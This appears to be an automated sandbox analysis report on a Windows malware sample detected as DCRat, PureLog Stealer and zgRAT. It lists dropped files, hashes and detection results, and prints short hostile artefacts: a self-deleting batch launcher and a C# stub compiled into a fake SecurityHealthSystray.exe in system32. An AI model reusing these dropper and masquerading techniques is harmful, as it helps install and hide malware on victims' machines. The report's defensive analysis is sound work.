                                       | wxl1r0lntg.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | HaLCYOFjMN.exe | Get hash | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | Browse |
                                       | Z90Z9bYzPa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | 0J5DzstGPi.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | HMhdtzxEHf.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | Gg6wivFINd.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | onlysteal.exe | Get hash | malicious | DCRat | Browse |
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (871), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):871
                                                          Entropy (8bit):5.902075817109225
                                                          Encrypted:false
                                                          SSDEEP:24:9xkrx39CWaxjUv2dP9SP/al8dmOQrmjG5JEC61v:9xkrxN6mv2dlJYbVjiJEB
                                                          MD5:7FA44E00D4EB831D3134C382ABD96AFA
                                                          SHA1:A09C17507669C4331A994A90D63F43E53464C0BE
                                                          SHA-256:F6D31FD6F93AE1785D660A505A44869A38C6D7F56C11AC716C561752D70D813E
                                                          SHA-512:4B1B005D379A2AF72404421B27BD5F8F44E8290D38CF429CB2A4CD1AF7418CBC791A1B7D3958F4ECD8C89E70F0A80CE45C52569953EFC15E7835A74320A88F28
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):101
                                                          Entropy (8bit):5.186248210470621
                                                          Encrypted:false
                                                          SSDEEP:3:s3IhoXw2EAHoAE5BCAnDAXwYvQQKb4cxAJA:s4hoXJiAaBDcAsv5+
                                                          MD5:746D44098AB92E627CEBE72CFA9C560D
                                                          SHA1:B51342547C4B9227DF75ED19D60C462827F83204
                                                          SHA-256:7CA477B6F171461FA1B2AE2350A938B518D4323A03D4ACC95DED7B4F518D1147
                                                          SHA-512:B5F3DAA4BEE7A3317C1BF23B0C0D12861742328478C31B7714798B5BE7ECD7AC6CC799532103DB9A8A2A0D90A347B553B92F9CBFAD43B2E19E57A16029449B03
                                                          Malicious:false
                                                          Preview:%lRKYody%%yftcuPKMMW%..%BUwdVVcSZJqB%"C:\ChainBroker/bridgeServerFontSavesMonitor.exe"%bCOwNyJisKelb%
                                                          Process:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):241
                                                          Entropy (8bit):5.903171335373703
                                                          Encrypted:false
                                                          SSDEEP:6:GogwqK+NkLzWbH9WF08nZNDd3RL1wQJRimhclR4Pe5Xkt3JhC+Es:GyMCzWL74d3XBJbhcl2mM97
                                                          MD5:EE1D4DD46A1CB9B8DCF5841DAE6BBC93
                                                          SHA1:7B5F9134A578673858B826C698DC0360DB7D565F
                                                          SHA-256:D2C34E5DA842BF7ECB384880D6DBF05DFFD1E59775961E017A281E3958F0B434
                                                          SHA-512:9D1DB891B0589E02812632D92EC297AE526ABDEB7D37367728C0B6CFDEB0FF34ACD9F5D8833654984FCEC124C328EB41E4AC805FB1F6D9477E2933731EED02B3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Process:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):218
                                                          Entropy (8bit):5.776378339472837
                                                          Encrypted:false
                                                          SSDEEP:6:huWSxrXxqGguy7n/nl1s0ucZQThCFZvYD8hM:ZAqLBTl5ZqhIZvYwhM
                                                          MD5:8D8B318D31D4835D1455587260D09E12
                                                          SHA1:D5A89996D8863F444B37B0835FA556B65BCD6401
                                                          SHA-256:7A909EF5ACE9255554880B57988195D1B92F3EF0E64D1BAAECCA7776FD30A44C
                                                          SHA-512:6989C99E035935F4BF9E47B253FCDB5D6871489490B98F24F058FAA18ECEF26FBCF532ECC3CC76B288EF16EA0320BFBB42C32DC8ADAC88BC673B849A182EEBD2
                                                          Malicious:false
                                                          Preview:3R1KpmqQTT0zWP6VG9TlmYNf7RVALWZ7IjPpJSdhfMBqBkjKjbThEEkeEVNYQpF742qw9RLxfwFaWgdWsLbtC12D9vkyFFQ0GEvI3wKSPfCS9KHh10pFOV4D9mxOqXsZfOTSuVd5AIegykEznC6PZLmuKsIR96m1xmwu0zxgWuFF1YOZi7lnbcAUmjHCMM5EgmsMyT8xPZ2oFg3vdtsCU8aVmb
                                                          Process:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):246
                                                          Entropy (8bit):5.280363117998461
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE1WD5j2AY5bgWEYKOZG1wkn23fx:HTg9uYDEosLfJ
                                                          MD5:858941AC9FA9DDEE088066984F5E3903
                                                          SHA1:D36FAF2F874B466BE8BE14E7EE35C953EE8C15F1
                                                          SHA-256:A6D64B98ECEB722932AD680CD3B56B7324B18739D1FE9245416A79B18E8534BD
                                                          SHA-512:9F0604C6D31081A9B798945372BCAC1207BB0D48E00A43503580DF0FFAF0B5867AD4E50C7103916828399C891AB0C6E5D7F10A2464729BE191CFC5DD6EA5C739
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FeErzF7oGb.bat"
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Fri Jan 10 06:19:03 2025, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1944
                                                          Entropy (8bit):4.5420385428703405
                                                          Encrypted:false
                                                          SSDEEP:24:HQC9aOO+kqiBhuXDfHfWwKJNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:++sBE/1KJMluOulajfqXSfbNtmhBZ
                                                          MD5:57D8B93966A7DFF581A866EF60CF5839
                                                          SHA1:33B53E36EB8E718FF471EDBABD9D06F1675C033E
                                                          SHA-256:AF82369DC2C80DE45ED19C674011559044E0B50B7C9F596F8106C5005339B602
                                                          SHA-512:9BE71F453C02E48F30529243A54D4C40533078E06ABD8CAE3687E992D38622C2F1ACECE97896F6BAB5AFCB8B4CBAEEB6466A91E46850DCEF4712DEE1C1EB22FD
                                                          Malicious:false
                                                          Preview:L.....g.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........;....c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP...................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES69DB.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\ChainBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.403856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:rdjXn:rdr
                                                          MD5:E17B86FFBB715F8973D8E2DB69B4928E
                                                          SHA1:F5514FC5BA047EA0D10977BFF9DB70433CC49EE8
                                                          SHA-256:47E86725DF89A0E0AB0EE785AC3C6241C9B73B1E448F0CF630D1124A47956794
                                                          SHA-512:F2A811761C44E747D6318051174F0FD641B0C4E7F4F84B28B0393A0BBBF3FAC816DAE4F0F2DFDF4C31CB1EAB2A682C48228009331CE5CF8FCE5C8106919AE26F
                                                          Malicious:false
                                                          Preview:CkP8xYCjVOFpWicd3thMXjWKr
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):417
                                                          Entropy (8bit):5.084077200645864
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLdseiFkD:JNVQIbSfhV7TiFkMSfh6FkD
                                                          MD5:61C065418F14A4276342E6FB50960C04
                                                          SHA1:AB85DAD7CAEC7FA4327E64900FFF2C8EB448B6FC
                                                          SHA-256:25EBDC2BECB54DBB7616C070C410D36FF195CB9544D5CDC89D5A13FB5C678F82
                                                          SHA-512:6625FF3E88EDA8AAA31310AB51594A0D340940B0103D3924B2D0087344B11C201BF18EE508AF2E486F575F0E4BD60C239D241B601F4C9601BCA56364D9465BAE
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.028522661364153
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fRhLBH:Hu7L//TRq79cQWfJH
                                                          MD5:20DCAC747D3A1ECD8FEBFF6947BE8E0E
                                                          SHA1:6D070C28AA454A71936CA19D75ED3BF9FA941097
                                                          SHA-256:776AC2D827E048967C459C6ABF1621255E943DAAA0DC423BEB4A2559D8804AF1
                                                          SHA-512:E1CD6130723567C1FAEB683C92D4854DC1239469394CCF2B209C55D64B59F2D0ECB458FC5BE631F53F0E3367793D18135C8B3DA4D1A53720CF5B14EBEB436FC4
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.0.cs"
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (321), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):742
                                                          Entropy (8bit):5.248874644352155
                                                          Encrypted:false
                                                          SSDEEP:12:xoMI/u7L//TRq79cQWfJOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/Vq79tWfMKax5DqBVKVrdFAMBJj
                                                          MD5:DB56D8738ACE229E968428541E164E26
                                                          SHA1:DDA2E2AC2C47135C2378BE6A1B6876B0452F70F3
                                                          SHA-256:92406C42FF94640D513DC9CEA7C4B11191BFC0E0B38F85583A1F21BF8253BA83
                                                          SHA-512:38791E4580BB85B9317D337A8BA5D11E5CC870807A002C34520F59EFFA8D350FC3E187C533E459B6AC15223D7393DF787043E0B1363449971C11107A36F48522
                                                          Malicious:false
                                                          Preview:.C:\ChainBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                          • Filename: PlZA6b48MW.exe, Detection: malicious, Browse
                                                          • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                          • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                          • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                          • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                          • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                          • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                          • Filename: Gg6wivFINd.exe, Detection: malicious, Browse
                                                          • Filename: onlysteal.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          • Antivirus: Virustotal, Detection: 35%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (615), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):615
                                                          Entropy (8bit):5.875939092492741
                                                          Encrypted:false
                                                          SSDEEP:12:T9IABximgoz8eD/TXJ0D+rrB9HsymGnk6Jp9Fofc1qDi1i:qABxFgS5LZFlLmk1FDKi1i
                                                          MD5:26F5D8C1E93F382F601F6C73CA5E6B65
                                                          SHA1:689DC24E15E6E6F818BDF8CD50B5C84AFDFF4D9C
                                                          SHA-256:BE7FC67170394BFA6121643690E3779482F7DA0C52C502ACF356EBF070E823B3
                                                          SHA-512:1AF19D87A484D2C4727BEB4C57D0364E852A62A4961A4EE1FC377DF5417C09EA5AFCF06EBD34D560DAC48BC557120DECBF014B57F1C9416D721C73AE868AE831
                                                          Malicious:false
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
